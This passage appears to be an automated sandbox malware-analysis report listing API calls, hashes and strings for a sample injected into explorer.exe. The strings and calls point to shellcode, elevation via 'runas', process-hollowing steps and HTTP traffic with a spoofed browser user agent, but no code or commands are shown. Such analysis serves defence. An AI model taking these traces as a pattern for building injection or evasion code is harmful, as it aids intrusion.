                          • lstrcpyA.KERNEL32 ref: 0119E6F6
                          • lstrcpyW.KERNEL32 ref: 0119E70C
                          • lstrcpyW.KERNEL32 ref: 0119E722
                          • LocalFree.KERNEL32 ref: 0119E7DE
                          • CloseHandle.KERNEL32 ref: 0119E803
                          • CloseHandle.KERNEL32 ref: 0119E811
                          • TerminateProcess.KERNEL32 ref: 0119E82B
                          • LocalFree.KERNEL32 ref: 0119E839
                          • OpenEventW.KERNEL32 ref: 0119E84D
                          • SetEvent.KERNEL32 ref: 0119E86E
                          • CloseHandle.KERNEL32 ref: 0119E87C
                          • LocalFree.KERNEL32 ref: 0119E887
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$Free$Deletelstrcpy$CloseFileHandle$Allocwnsprintf$FolderKnownOpenPathTask$EventProcesslstrlen$AttributesTime$AddressCurrentDirectoryDuplicateObjectProcSingleValueWait$CreateInitializeLibraryLoadMutexOperationRemoveSystemTerminateUninitializeWindows
                          • String ID: %s%s$2$SOFTWARE\%s$Software\%s$Software\%s$Software\%s$Spotify.exe$h${2046C745-B848-47EE-8068-B039EAC15A1C}${29C72B9F-C97F-4A3E-B2AD-47E00C9D4930}${7EE6EBB8-7FBC-4C3E-AAB8-F5FE9571F428}${A25A8DA7-6938-4CAB-8D05-4B8A4D0816BC}${F711BB4E-52A0-4F2C-BD3A-54EB0B2E6079}
                          • API String ID: 2965556141-3169802617
                          • Opcode ID: 16e865494beb0c0552abcd8ac02d39e7152076fd49e31f46be9424e4a944fc86
                          • Instruction ID: 9c9495f28ff33522d172e395a5a1829b91d87b88bacb6142b11d9f0ea8669b3f
                          • Opcode Fuzzy Hash: 16e865494beb0c0552abcd8ac02d39e7152076fd49e31f46be9424e4a944fc86
                          • Instruction Fuzzy Hash: 27321572219AC595EB75DF14F8887DAB3A5F788758F800126D68D83B68EF7CC249CB40
                          APIs
                          • GetCommandLineW.KERNEL32 ref: 0119E8C7
                          • CommandLineToArgvW.SHELL32 ref: 0119E8DC
                          • lstrcmpiW.KERNEL32 ref: 0119E8F7
                          • lstrcmpiW.KERNEL32 ref: 0119E91D
                            • Part of subcall function 01195AD0: GetModuleFileNameW.KERNEL32 ref: 01195AFE
                            • Part of subcall function 01195AD0: _LDint.LIBCPMTD ref: 01195B15
                            • Part of subcall function 01195AD0: CreateFileW.KERNEL32 ref: 01195B93
                            • Part of subcall function 01195AD0: WriteFile.KERNEL32 ref: 01195BF0
                            • Part of subcall function 01195AD0: CloseHandle.KERNEL32 ref: 01195C13
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$CommandLinelstrcmpi$ArgvCloseCreateDintHandleModuleNameWrite
                          • String ID: shellcode${094CBDBD-CA58-4DF6-999A-7FCC415A528A}${0F0641A2-3ABD-446F-81C5-65FC68B7C330}${1C8F1E61-D31A-4DE2-A46A-E1D82FC75222}${4002ADAA-2323-44A5-9F39-80B79D7023EC}${669627E2-6B39-4990-B906-8786734FF1DD}${72A3B189-93CE-456F-B494-1FB1DB2DA359}${8BF89F76-FE32-4DAA-9B54-D6ACD7227894}${A44FB1B8-C69C-4CA5-B3EE-4AE5C96B528F}${BBD69D41-7ECF-4B3B-8592-7E70DE12B303}
                          • API String ID: 3070626111-1066670274
                          • Opcode ID: 3127917cb21087ce76972a75fedb307400ad31297a52c85d84f0972bdcbee6c9
                          • Instruction ID: 006275480f0de491ab6a7862712b8f6f563df941517fb7f3eca209ed215f3563
                          • Opcode Fuzzy Hash: 3127917cb21087ce76972a75fedb307400ad31297a52c85d84f0972bdcbee6c9
                          • Instruction Fuzzy Hash: 04B1FB31205E8482EB5CEF29E8443DA67A1F788B95F444139E79B876B4DF7CC48ACB41
                          APIs
                          • setsockopt.WS2_32 ref: 0119A460
                          • SetEvent.KERNEL32 ref: 0119A4CF
                          • LocalAlloc.KERNEL32 ref: 0119A50A
                          • wnsprintfW.SHLWAPI ref: 0119A54F
                          • LocalAlloc.KERNEL32 ref: 0119A55F
                          • lstrcpyW.KERNEL32 ref: 0119A58C
                          • LocalAlloc.KERNEL32 ref: 0119A5B5
                          • lstrcpyW.KERNEL32 ref: 0119A5E1
                          • CoInitializeEx.COMBASE ref: 0119A660
                          • ShellExecuteExW.SHELL32 ref: 0119A675
                          • GetLastError.KERNEL32 ref: 0119A682
                          • CoUninitialize.COMBASE ref: 0119A699
                          • LocalAlloc.KERNEL32 ref: 0119A6E2
                          • wnsprintfW.SHLWAPI ref: 0119A733
                          • CreateProcessW.KERNEL32 ref: 0119A7A2
                          • OpenEventW.KERNEL32 ref: 0119A7C7
                          • SetEvent.KERNEL32 ref: 0119A7E8
                          • CloseHandle.KERNEL32 ref: 0119A7F6
                          • LocalFree.KERNEL32 ref: 0119A804
                          • LocalFree.KERNEL32 ref: 0119A812
                          • OpenEventW.KERNEL32 ref: 0119A828
                          • SetEvent.KERNEL32 ref: 0119A849
                          • CloseHandle.KERNEL32 ref: 0119A857
                          • LocalFree.KERNEL32 ref: 0119A865
                          • LocalFree.KERNEL32 ref: 0119A873
                          • LocalFree.KERNEL32 ref: 0119A881
                          • LocalFree.KERNEL32 ref: 0119A88F
                          • shutdown.WS2_32 ref: 0119A89F
                          • closesocket.WS2_32 ref: 0119A8AA
                            • Part of subcall function 0119FBA0: CreateDirectoryW.KERNEL32 ref: 0119FBD8
                            • Part of subcall function 0119FBA0: GetLastError.KERNEL32 ref: 0119FBE3
                            • Part of subcall function 0119FBA0: LocalAlloc.KERNEL32 ref: 0119FBFE
                            • Part of subcall function 0119FBA0: CreateFileW.KERNEL32 ref: 0119FC6E
                            • Part of subcall function 0119FBA0: GetLastError.KERNEL32 ref: 0119FC79
                            • Part of subcall function 0119FBA0: LocalFree.KERNEL32 ref: 0119FD16
                            • Part of subcall function 0119FBA0: LocalFree.KERNEL32 ref: 0119FD21
                            • Part of subcall function 0119F510: SHGetKnownFolderPath.SHELL32 ref: 0119F587
                            • Part of subcall function 0119F510: lstrlenW.KERNEL32 ref: 0119F59A
                            • Part of subcall function 0119F510: lstrlenW.KERNEL32 ref: 0119F5B5
                            • Part of subcall function 0119F510: LocalAlloc.KERNEL32 ref: 0119F5DC
                            • Part of subcall function 0119F510: lstrlenW.KERNEL32 ref: 0119F620
                            • Part of subcall function 0119F510: CoTaskMemFree.COMBASE ref: 0119F635
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$Free$Alloc$Event$CreateErrorLastlstrlen$CloseHandleOpenlstrcpywnsprintf$DirectoryExecuteFileFolderInitializeKnownPathProcessShellTaskUninitializeclosesocketsetsockoptshutdown
                          • String ID: "%s%s"$"%s%s" %s$@@$Spotify.exe$h$p$runas${29C72B9F-C97F-4A3E-B2AD-47E00C9D4930}${8BF89F76-FE32-4DAA-9B54-D6ACD7227894}${A44FB1B8-C69C-4CA5-B3EE-4AE5C96B528F}
                          • API String ID: 852330099-1461230316
                          • Opcode ID: 9fdb54751ab223528b477e0356fa8e77d3d1709116a267faf5ee03a62359e9d4
                          • Instruction ID: 92184b23f463e4af59921ff9a0ea1eef1c8d79052083d652d5c04cc0f4d71c92
                          • Opcode Fuzzy Hash: 9fdb54751ab223528b477e0356fa8e77d3d1709116a267faf5ee03a62359e9d4
                          • Instruction Fuzzy Hash: EEC1B436208B8586EB799F14F4983DAB3A1F788755F50412ADB9E47B68DF7CC089CB40
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Section$View$CloseUnmap$Process$CreateCurrentThread$ContextHandle$ResumeTerminate
                          • String ID: @$@$h
                          • API String ID: 2911138354-1939477041
                          • Opcode ID: 8b9736486d1c1bb18502a02d052894d07546cc1a1eb466c729bb3f1f531f4655
                          • Instruction ID: 88b892271f903a968db1b7649dcc384ff0003fd423cc6251cb810ae5bb2662ef
                          • Opcode Fuzzy Hash: 8b9736486d1c1bb18502a02d052894d07546cc1a1eb466c729bb3f1f531f4655
                          • Instruction Fuzzy Hash: 47D19C76118AC486E764DB15F4983DAB7A1F7C8798F004129EB8A83B68DF7DC499CF40
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: __doserrno_errno_invalid_parameter_noinfo
                          • String ID: U
                          • API String ID: 3902385426-4171548499
                          • Opcode ID: 8f6b26654e27598fab1e916dcbf4c9cba279a53099fc561579a7e683be8f4827
                          • Instruction ID: 44a0304da33c6dc462b67f901bf5f259d42d849a7e809986802eb8c354b9a0cd
                          • Opcode Fuzzy Hash: 8f6b26654e27598fab1e916dcbf4c9cba279a53099fc561579a7e683be8f4827
                          • Instruction Fuzzy Hash: D6022733304A8686EB289F29E8C47EEB761F799B84F55011AEF4A47758DB3DC046CB40
                          APIs
                          Strings
                          • Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0, xrefs: 011AD0D8
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$Create$EventFreeLocalMutex
                          • String ID: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
                          • API String ID: 4059844998-3593534564
                          • Opcode ID: 09c84e51a5f2523b42a324423d7d7ca560e18063558a9df129115e9e782c7eef
                          • Instruction ID: 3431d2b4c51be71dc411ea347d5448bec7971b03a6b879a09ba2682e7e9ce587
                          • Opcode Fuzzy Hash: 09c84e51a5f2523b42a324423d7d7ca560e18063558a9df129115e9e782c7eef
                          • Instruction Fuzzy Hash: 94A12B39208F9582EB6CDB65F8547DA67A5FB80754F80423AE79D43AA4DF3DC486CB00
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateErrorLastPath$DirectoryFileFolderFreeKnownTaskTemplstrcpy
                          • String ID: "%s"$"%s" "%s"$%s\%s$%s\%s$Open$h
                          • API String ID: 1929679530-3531242659
                          • Opcode ID: cbe97f7d8983bdb2611ec03a94b5e63e71019160d72ef76e16489aa1337f778f
                          • Instruction ID: 53d02ea1af17275bd12fb4073f58f1779b77ec8c47826cd02617bbc5f4ccae15
                          • Opcode Fuzzy Hash: cbe97f7d8983bdb2611ec03a94b5e63e71019160d72ef76e16489aa1337f778f
                          • Instruction Fuzzy Hash: 54B13732218BC596EB78DF64E4883DAB7A2F784754F804226D69D83B98DF3CC519CB40
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: HEAD$NTDLL.DLL$RtlTimeToSecondsSince1970$application/octet-stream$h$text/plain
                          • API String ID: 0-2522958032
                          • Opcode ID: 046551e85585fe9dc31a01bf0e73871837a0d248a0eed496a8bb53954d6c9c8e
                          • Instruction ID: 2839f13eceb27ae04495f2baba6e07059930027d46a24f061f6665be305728af
                          • Opcode Fuzzy Hash: 046551e85585fe9dc31a01bf0e73871837a0d248a0eed496a8bb53954d6c9c8e
                          • Instruction Fuzzy Hash: 65D1E476218AC486E7799B54F4947DEBBA1F7C8744F80412ADB8A43A68DF7CC489CF40
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: GET$application/octet-stream$h$text/plain
                          • API String ID: 0-3456709813
                          • Opcode ID: c8664ecd2ce9a1dc014cd3d8be18d4b3b9f4ddf8030916ce27af9d2bff062b64
                          • Instruction ID: 9968fd7468e0bfedd2ae88273173d87800b82e8584cf03b87b71d7b4c86cdb2c
                          • Opcode Fuzzy Hash: c8664ecd2ce9a1dc014cd3d8be18d4b3b9f4ddf8030916ce27af9d2bff062b64
                          • Instruction Fuzzy Hash: 5F02D376219BC486E7789B15F4947DABBA1F788744F80452AEB8A83B58DF3CC485CF40
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$FindSleep$AttributesDirectoryRemove$CloseDeleteFirstFolderFreeKnownNextPathTask_errno_invalid_parameter_noinfolstrlen
                          • String ID: %s\%s$%s\*.*$%s\System32$\\?\%s
                          • API String ID: 3007324005-2457321626
                          • Opcode ID: b267a56e6ab7b9a000c922ea95a34f4d4a28f519d58c957bc6e25a78e90fa5e3
                          • Instruction ID: d1b2c0fd11a909284f6b9dd9e4c8a58f68fb0051b4ca820953922c77b92c7860
                          • Opcode Fuzzy Hash: b267a56e6ab7b9a000c922ea95a34f4d4a28f519d58c957bc6e25a78e90fa5e3
                          • Instruction Fuzzy Hash: 296168311189C9C6EB28DF24E8943DE73A1F7C4758F80452AD7AA87A98DF3DC555CB40
                          APIs
                          • LocalAlloc.KERNEL32 ref: 011B5AE1
                          • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,011B56ED), ref: 011B5AFF
                          • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,011B56ED), ref: 011B5B17
                          • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,011B56ED), ref: 011B5B30
                          • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,011B56ED), ref: 011B5B48
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$Free$AddressAllocLibraryLoadProc
                          • String ID: NTDLL.DLL$RtlGetVersion
                          • API String ID: 2539306102-196638859
                          • Opcode ID: 2a0aeae9c634e8d68b7f2cb2bba8257a7f840cb0e5baf0165ae7715a5647e2fc
                          • Instruction ID: 4a24589e8d57fdd519e54adc80e5f9a0b236af44d7ce1455afc75521486d66d2
                          • Opcode Fuzzy Hash: 2a0aeae9c634e8d68b7f2cb2bba8257a7f840cb0e5baf0165ae7715a5647e2fc
                          • Instruction Fuzzy Hash: 3051E576209A8886E768DF15E4947DA77A5F788B48F400629EB8E83768DF3CC545CF40
                          APIs
                          • _set_error_mode.LIBCMT ref: 011BEA01
                          • _set_error_mode.LIBCMT ref: 011BEA12
                          • GetModuleFileNameW.KERNEL32 ref: 011BEA74
                            • Part of subcall function 011BA964: GetCurrentProcess.KERNEL32(?,?,?,?,011BAA06), ref: 011BA97C
                          • GetStdHandle.KERNEL32 ref: 011BEB89
                          • WriteFile.KERNEL32 ref: 011BEBE6
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: File_set_error_mode$CurrentHandleModuleNameProcessWrite
                          • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                          • API String ID: 2183313154-4022980321
                          • Opcode ID: ef2a5d33bd846243a7eab9aed687a3acfa5533d68f3e617418224947dace77c2
                          • Instruction ID: 174cd5a676763db885130b8717d44444b7ae97de636fb843f183b632e2c55d2a
                          • Opcode Fuzzy Hash: ef2a5d33bd846243a7eab9aed687a3acfa5533d68f3e617418224947dace77c2
                          • Instruction Fuzzy Hash: 8F51F23630579282EB2CDB39B9A47EA7356FB99B88F44412ADF5A43B54DF3CC106C640
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Close$HandleSectionUnmapView$ProcessTerminate
                          • String ID:
                          • API String ID: 4250251239-0
                          • Opcode ID: 4f910b99a22f92765c46a41be600696b4279f963f897c9c5538e65b4968240ee
                          • Instruction ID: a8a9b4acdcdaa365654ae465915b8cc4263ed6fce3928a61426e7298801910c7
                          • Opcode Fuzzy Hash: 4f910b99a22f92765c46a41be600696b4279f963f897c9c5538e65b4968240ee
                          • Instruction Fuzzy Hash: 60115C75515A8481DB68EF16F8543DE7361F7C8BA5F004026EB8E42A68CF7DC486CB00
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
